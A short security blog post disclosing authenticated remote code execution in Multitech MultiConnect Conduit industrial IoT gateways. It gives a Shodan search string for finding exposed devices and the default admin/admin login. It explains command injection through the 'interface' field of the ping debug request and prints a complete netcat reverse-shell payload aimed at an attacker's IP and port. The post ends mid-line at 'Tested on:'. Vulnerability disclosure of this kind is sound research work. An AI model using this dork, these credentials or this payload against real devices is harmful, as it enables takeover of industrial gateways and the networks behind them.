Monday, January 20, 2020

[Multitech] Authenticated Remote Code Execution in MultiConnect Conduit devices

[Multitech] MultiConnect Conduit


Multitech Conduit is a configurable, scalable cellular communications gateway for industrial IoT applications, and using a web platform function it's possible to execute remote code due to poor sanitization of a parameter.

Shodan Dork: title:"MultiConnect® Conduit"

Proof of Concept

By default, the credentials of this platform are Username: admin and Password: admin

After logging in, we go to the debug options:

                   Administration > Debug Options

We enter an IP within the Ping section, and then execute the function.

As we can see, a payload is sent in json format with the IP address and network interface. In the "interface" field we can enter OS commands between semicolons (;).

Example: {"ip":"","interface":";commands;"}

Unfortunately, the output of the executed commands cannot be displayed in the response. So, I created a simple script to send a reverse shell with the following payload:

{"ip":"","interface":";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f;"}

We run the script and we got shell. :)

Tested on: